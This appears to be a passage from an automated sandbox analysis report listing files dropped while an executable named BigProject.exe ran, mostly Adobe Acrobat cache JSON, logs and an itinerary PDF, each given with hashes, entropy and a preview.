SSDEEP:	6:YEQXJ2HX4lzPctO+FIbRI6XVW7+0Y+sFUoAvJfzdPeUkwRe9:YvXKX4mtjYpW78FGb8Ukee9
MD5:	531646240785E3071721036465EE1BFB
SHA1:	79C7C6B544ED67B1C35C5059B8815EB946AB6619
SHA-256:	50F21A9742EC59C2512922A056A9EA5D0097A4097C529A75305B7414A82DE1D1
SHA-512:	5EE1FBB4F2FC87EAEF6F276225A9B29F8C96BFA81166695DDDD2FEE9742E91192E9DDAAADA96D11E534AA574EB2B4CB584A5BB64EB029A6BAD21D1005E53E3A5
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.267172798522027
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4lzPctO+FIbRI6XVW7+0Y+sFUoAvJfYdPeUkwRe9:YvXKX4mtjYpW78FGg8Ukee9
MD5:	0746E803DB11912CCDC5AE4188887FE7
SHA1:	0E60CCF940D721F980113E915D3AEE3F74AC3B88
SHA-256:	1EB34E173584B9A66FFB1AEF725C1B0F9809E5B9DA13C17B2D03C19A28361181
SHA-512:	5E4E0322C5D6C7BE7BC35A7D590DEC5D7711C3FDB71200592D7CAD130E742638DEFD3736EB81F998F0DBB25D1929DFD96D61CEDBF66D4D2DC4587E322B35E776
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.252645227656909
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4lzPctO+FIbRI6XVW7+0Y+sFUoAvJf+dPeUkwRe9:YvXKX4mtjYpW78FG28Ukee9
MD5:	B76929FC7AFD84F4ED4AD01221A596C3
SHA1:	E482BAF138DA542408EA41B269F42325D3B552D2
SHA-256:	3F499569BB230BD1D27AF039CBBB10889C942E7E2F4889742D527E2815292795
SHA-512:	EBA245DFF27559D3E0F5BB8777131F0D39FE24BA529027684B8D8C400D947A3FA3FB88C140554402C5F663071424913AE3BA44CF66B4925F0B6C51C2D4AD331E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.250945512700895
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4lzPctO+FIbRI6XVW7+0Y+sFUoAvJfbPtdPeUkwRe9:YvXKX4mtjYpW78FGDV8Ukee9
MD5:	001C821C5426F3F44CE4942C4A3C7F74
SHA1:	9CA84C1BED247E7647052CF52D073AA43FE22C43
SHA-256:	28D0ED629FAA82932A908727D0B163F0F8BDDB64F11DC60BF6524D9E5D0BEE50
SHA-512:	017D726C238FC858B306A03C1EE59F6CE07003527257C74EBE15D24220CC73E2B4050F5737E44A555351B4FC620DAA14F0EB6B3F34E50F7EA314562B3D85A69D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.251849973882246
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4lzPctO+FIbRI6XVW7+0Y+sFUoAvJf21rPeUkwRe9:YvXKX4mtjYpW78FG+16Ukee9
MD5:	6A07879C8FBB95E79B2CFCF593589640
SHA1:	E399C5302E7745552297D193B00EA6EF6AD73554
SHA-256:	09A3997B3A13142D47BAB5FA8A1F3F780A1827AE98356FAD929F7DB9D769BD2D
SHA-512:	0D2FDA81701D48D2C0CF5422C677A0A8E77B419F7BD0057D4AD7CCFAE0C7F7ACA09601CD225494AA573CC5E14496F44591540005058041ECDB9FDCADA0170CC0
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.6643901605840625
Encrypted:	false
SSDEEP:	24:Yv6X49i8WamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSP:YvanBgkDMUJUAh8cvMP
MD5:	9C98CF86BDE1AA5299909D468E577404
SHA1:	F8279C0DDEFA08107E06AC1F845FDAC6F2CDF6E6
SHA-256:	4DDA1B58590A938B86B623B92D17C2196A5F5A56A1799787B2B192CAFD981E8A
SHA-512:	E5B5EE4FD0548115984565B8A8AFFAEB3DC6E5481D39DCCB1847EA4345D920988B9A625C6A3C1026F7092EC6001F748ECDCA05CC083F6B6CB2514B06CBA2F08C
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.226367093219598
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4lzPctO+FIbRI6XVW7+0Y+sFUoAvJfshHHrPeUkwRe9:YvXKX4mtjYpW78FGUUUkee9
MD5:	D327F6489DB0BE0B07FF82C3F76058A9
SHA1:	892B8F18D1582D218BF573F7928AA231BA01EAAA
SHA-256:	09359688C34D298C3DFC959193AD6DF236C7F166AECDC94C7BFD6780DAE633EC
SHA-512:	F8777A9B0E385080EFD434E2466DAD690022B32D3970D02F8459272321D29FC33A058D054C91B6BC067FF41400D6DD90ED64A6AF3E0E6BF737C45B70DFC5E390
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.2371390024047155
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4lzPctO+FIbRI6XVW7+0Y+sFUoAvJTqgFCrPeUkwRe9:YvXKX4mtjYpW78FGTq16Ukee9
MD5:	25D560A6090F98773734B78C0F96AF96
SHA1:	419E356E06443F313B07478DDC40C1FFAE2B8D1A
SHA-256:	9AC95986DDA5FA5AD1F8D4560F45F3C9C852B1753254B25D940F7EFE04915FC6
SHA-512:	6585DDC218727F0D294C7EA1CDA61F58171FB79CBAA540C7B4518203C4BCF39834D8F67A7C2B4A260D2A73CE7439FA597F8D039514B8202FB92C04CF6E68105E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"c8ff1bef-482d-42f1-9f16-2ab074746d17","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734962984446,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.144006588516618
Encrypted:	false
SSDEEP:	48:YYnDUoS6vZAIQiFk3hPtpHP6nRhc4ub9E3:DDLS6B1Q8glpHohgpE3
MD5:	F1AEE56BD89B6F023DB7759C18302855
SHA1:	EA9C51B6066101B6DFEE7D6AC3DC8CA17FF3A78F
SHA-256:	11201E9EA593DBB865D2EDCAC03DA50AB7468B774A9FF5602E1E534D37F30485
SHA-512:	D78D2A244A7778D5F5851139843EC8A61C483426505B74B3EE515F6E0DE51FB2A7F729D46C5BC579DF1951E858889A3C0FE3EB33DEE6B660366AE0F97A972A6B
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"5a1a2a446b94d5539c26279bf8612eb0","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734783449000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"9c9c13d123700636eb8b456896d291f5","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734783449000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"fc7d9742191cbfa68f916aec314d9eb6","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734783449000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"4341c8b3c2b4e80345b168bf220612ed","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734783449000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"a4e53cc23e6ab7b16b5691a5295e13dc","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1734783449000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"fa3ed7716887e97aaa15ca7688fbf3fe","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	0.9861200293203947
Encrypted:	false
SSDEEP:	24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpbeS4zJwtNBwtNbRZ6bRZ4YeSF:TVl2GL7ms6ggOVpbGzutYtp6PVH
MD5:	6D1FD8F483C18195F89DB96DA637E86B
SHA1:	DA2BD84237F01F67F58C3D4D1876C9FA022A6111
SHA-256:	7EABEB3E6907D6F5BA6609D135069FC1541275C9BF5F616B6BC76AB9F5DFE660
SHA-512:	FADF9BA7C266576B877FAF1927BDF02132ADDD82D0962B4510FC983C16C996AC1045E1FFAEAF91DD5B51ED0E304B553C96D050396622D49D0122046E6E407BDB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.3393651894411216
Encrypted:	false
SSDEEP:	24:7+tAmAD1RZKHs/Ds/SpbeSPzJwtNBwtNbRZ6bRZWf1RZKxqLBx/XYKQvGJF7ursD:7MAmGgOVpbdzutYtp6PM0qll2GL7msD
MD5:	C1F4A544E531CA52D356849488E5D660
SHA1:	F620067E3F5DCC1DBA998C736F7CF22EAA95B628
SHA-256:	69D07ADAD7F05CAE4A4498853EF57508E26AB64D36A0CB6419C06C654BF04100
SHA-512:	B1410B7D0BDD6E3DCABA8745369F4CD2350539F72B9D5A1B14EA40DA065FFCB84DA4841C5218A4243DE6FFAF1AC25DC8BDF51FD21B2A26A11C5ECA5D05F1D6AF
Malicious:	false
Preview:	.... .c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgG+SP+d7aFqNsGW9drniN7tk8DEVoYyu:6a6TZ44ADEG+IQ7a4NvttkVSK
MD5:	1DE6CADC6ADA823628FF2998472E3F91
SHA1:	61034627AB4AC9407EE3255DA12817CCF9105592
SHA-256:	5A15C3BC21CE24D6545666143004DD9DDA3A916F2799320343D46219084AF495
SHA-512:	C39B716B5B4AC0739D17A8389B8BD9E7DF51F68EE44A574F6BC39C0DB19BC812E197DCEBC5D43EC0D4D6CB230E1F1FA39E337264587AC03CC3090B4E7AFD43AD
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\NavanItinerary[1].pdf

Download File

Process:	C:\Users\user\Desktop\BigProject.exe
File Type:	PDF document, version 1.4, 2 pages
Category:	dropped
Size (bytes):	51800
Entropy (8bit):	7.644473294145779
Encrypted:	false
SSDEEP:	768:yaBT4Xd/H2AZAyXOKmd8iOK5ZezAr5MUXs6dcoboWopxasKk48WoGQICpVMRtJHi:0XaPEaAHjlO4Bsl52QAVZFKdtTvyh
MD5:	0AEE57F18680198E40AA2A6B37D2EB7E
SHA1:	222695CE34141FF67BC730F534A363A47CE9791D
SHA-256:	EFEEBFD836442C3C6D011F68D0A8B48F0323AF49F60C53243341703122CC5A07
SHA-512:	DC7C1DB22E7F6A0AC2A1831C6652CFD8A96C9D5B64D50775822D20DA1193EF4134CECEFF23AED3AC5A6CE8C3E754B3FCF54313650807623A50E55A4E5DC76749
Malicious:	false
Preview:	%PDF-1.4.%.....1 0 obj.<</Title (Navan - Itinerary)./Creator (Mozilla/5.0 $Windows NT 10.0; Win64; x64$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/128.0.0.0 Safari/537.36)./Producer (Skia/PDF m128)./CreationDate (D:20240909222619+00'00')./ModDate (D:20240909222619+00'00')>>.endobj.3 0 obj.<</ca 1./BM /Normal>>.endobj.7 0 obj.<</Filter /FlateDecode./Length 3830>> stream.x..<Y...q..+.11.b.]]U.A`I.B.....<..Kv@......A.w....+.......=.u.]..........W.../...?.\@D..BN.Z.9."r..-?.....).9.p`@.j.s.tr....` .._....o.....^}+...9.B.h.R...\|>.......>.I.5..$"@...I..U......`....\P......\#Y...-o..........7~:.....5..?...9.#..A`M2...pRB.X..T..H.B.....O.NX.x..A..Md.l.......70.T.B...&n..&..[..'61......uRk.U"/$.RC.......Bj.R}.b@..V...3M5.&.a...%G...=q.Vb^I!.u..H..V.d.#x.$..+.U.<..i... x#.(-.pL.a..jt.NR.....eM.?.vT..9....O..j..?.R...D,..`(...s..r.5..d2.%..M.XX.......9W@.XW..7......Q.I.aI..I.vk...D.y.B.[.....$x..x.o..y1'!Q...O.s.u]UhU5b6..H}%.*r..9.N.\.R.ZJ].4$...jrE..)m.BeM.).....'

C:\Users\user\AppData\Local\Temp\MSIdf767.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.4857408731223103
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8dkr7:Qw946cPbiOxDlbYnuRK/r7
MD5:	ACBD64C7878A9F83EB7DE86DFD164CF7
SHA1:	1FC273C10E93F9B69B575B8DFB65D0E072B8DFC9
SHA-256:	38931920E735255E2401F0B1B50696855FF86667E82800AC25DDC2FD0497C574
SHA-512:	9A0F9258F2B0CFF667B14A3923D453E6A41561614A80727D3896CEA7EBDC2419EEFF76C1000B6DB045DF761351F5E792D35E8942DB40D35E98D885DAF8933C79
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.1./.1.2./.2.0.2.4. . .0.7.:.1.7.:.2.4. .=.=.=.....

C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf

Download File

Process:	C:\Users\user\Desktop\BigProject.exe
File Type:	PDF document, version 1.4, 2 pages
Category:	dropped
Size (bytes):	51800
Entropy (8bit):	7.644473294145779
Encrypted:	false
SSDEEP:	768:yaBT4Xd/H2AZAyXOKmd8iOK5ZezAr5MUXs6dcoboWopxasKk48WoGQICpVMRtJHi:0XaPEaAHjlO4Bsl52QAVZFKdtTvyh
MD5:	0AEE57F18680198E40AA2A6B37D2EB7E
SHA1:	222695CE34141FF67BC730F534A363A47CE9791D
SHA-256:	EFEEBFD836442C3C6D011F68D0A8B48F0323AF49F60C53243341703122CC5A07
SHA-512:	DC7C1DB22E7F6A0AC2A1831C6652CFD8A96C9D5B64D50775822D20DA1193EF4134CECEFF23AED3AC5A6CE8C3E754B3FCF54313650807623A50E55A4E5DC76749
Malicious:	false
Preview:	%PDF-1.4.%.....1 0 obj.<</Title (Navan - Itinerary)./Creator (Mozilla/5.0 $Windows NT 10.0; Win64; x64$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/128.0.0.0 Safari/537.36)./Producer (Skia/PDF m128)./CreationDate (D:20240909222619+00'00')./ModDate (D:20240909222619+00'00')>>.endobj.3 0 obj.<</ca 1./BM /Normal>>.endobj.7 0 obj.<</Filter /FlateDecode./Length 3830>> stream.x..<Y...q..+.11.b.]]U.A`I.B.....<..Kv@......A.w....+.......=.u.]..........W.../...?.\@D..BN.Z.9."r..-?.....).9.p`@.j.s.tr....` .._....o.....^}+...9.B.h.R...\|>.......>.I.5..$"@...I..U......`....\P......\#Y...-o..........7~:.....5..?...9.#..A`M2...pRB.X..T..H.B.....O.NX.x..A..Md.l.......70.T.B...&n..&..[..'61......uRk.U"/$.RC.......Bj.R}.b@..V...3M5.&.a...%G...=q.Vb^I!.u..H..V.d.#x.$..+.U.<..i... x#.(-.pL.a..jt.NR.....eM.?.vT..9....O..j..?.R...D,..`(...s..r.5..d2.%..M.XX.......9W@.XW..7......Q.I.aI..I.vk...D.y.B.[.....$x..x.o..y1'!Q...O.s.u]UhU5b6..H}%.*r..9.N.\.R.ZJ].4$...jrE..)m.BeM.).....'

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-21 07-17-18-381.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.376360055978702
Encrypted:	false
SSDEEP:	384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
MD5:	1336667A75083BF81E2632FABAA88B67
SHA1:	46E40800B27D95DAED0DBB830E0D0BA85C031D40
SHA-256:	F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
SHA-512:	D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
Malicious:	false
Preview:	SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15113
Entropy (8bit):	5.359048872344854
Encrypted:	false
SSDEEP:	384:npvcntufxWvJtyCgUg6gIgMRFGxo8HuLl8gq1yFZnbXmJ4e4ZHOvtMatlwlw9AKp:rUA
MD5:	76032492296B6ADF28EC746CCBC3BA40
SHA1:	1D24EBCB9E2BCDC55FB5BE2EF142B61689ECDC3D
SHA-256:	0C7853ADB262A57C2B10ADBB080E6F3F67979B415682FDD350B326081AEDA010
SHA-512:	164E23FA8CA568F6CFFF564B9D79AE9E2C80FA3549F595B34A6B418F537B85CF32AD453186D9D65BB0675365C4ACDEC4DF82919124DDCBADC887021B3C17598A
Malicious:	false
Preview:	SessionID=7ed98594-e69c-455e-b91c-8a3beb205a05.1734783438406 Timestamp=2024-12-21T07:17:18:407-0500 ThreadID=6396 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=7ed98594-e69c-455e-b91c-8a3beb205a05.1734783438406 Timestamp=2024-12-21T07:17:18:408-0500 ThreadID=6396 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=7ed98594-e69c-455e-b91c-8a3beb205a05.1734783438406 Timestamp=2024-12-21T07:17:18:408-0500 ThreadID=6396 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=7ed98594-e69c-455e-b91c-8a3beb205a05.1734783438406 Timestamp=2024-12-21T07:17:18:408-0500 ThreadID=6396 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=7ed98594-e69c-455e-b91c-8a3beb205a05.1734783438406 Timestamp=2024-12-21T07:17:18:408-0500 ThreadID=6396 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.397942280579044
Encrypted:	false
SSDEEP:	768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbf:T
MD5:	D50E3C3784E360C7070399BB5B587297
SHA1:	3D093E2660F85A6ADD3F6785119817B042F8B43A
SHA-256:	4AD504973D5507589DA0EC33F1CAA1FF0BEA2A5C4BC08EF56F9DF433130A49B0
SHA-512:	15712E87E0BDC3DBCBD11CCF82E4D1C506AE6D8E3A0B0B0C6CC109CBCC646F61DC0B79EB6090FACB97E120D66E98F50BA9771287F39B2320FD090E2000DF2B1A
Malicious:	false
Preview:	04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : *************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***********************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - 